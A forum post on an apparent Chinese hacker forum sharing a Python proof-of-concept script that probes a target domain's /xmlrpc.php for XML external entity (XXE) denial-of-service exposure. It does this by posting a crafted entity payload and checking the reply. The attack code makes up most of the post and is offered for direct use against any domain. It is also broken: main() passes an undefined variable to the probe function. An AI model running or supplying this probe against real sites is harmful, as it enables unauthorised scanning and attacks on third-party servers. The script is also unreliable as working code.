• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

XXE的DOS攻击POC


H4CK

Recommended Posts

XXE又名外部实体注入攻击漏洞,此exp由python3编写,进行漏洞探测。

 

使用命令如下:python XXE_DoS_PoC.py www.test.com

 

核心代码如下:

# -*- coding:utf-8 -*-

import urllib.request

import urllib.parse

import urllib

import sys

import hashlib



def poc(domain):

    headers = {} #消息头信息

    target = "%s/xmlrpc.php" % domain

    payload = """ <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "a">%remote;]> """

    post_data = {      

        "" : payload,

    }  #POST提交测试代码

    try:

        req = urllib.request.Request(target, data = urllib.parse.urlencode(post_data).encode("UTF-8"), method= "POST")

        response = urllib.request.urlopen(req)

        s = "well formed" #找到命令执行后的回显

        if response:

            data = response.read()

            data = str(data, encoding = "utf-8")

            #print(data)

            if data.find("well formed") != -1:   #获得了证明漏洞存在的回显

                print("likely - XXE DoS\n")



    except Exception as e:

        print("Running Wrong...")

        print(e)

def main():

    args = sys.argv

    url = ""

    if len(args) == 2:

        url = args[1]

        poc(domain)

    else:

        print("Usage: python %s url" % (args[0]))

if __name__ == "__main__":

    main()

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now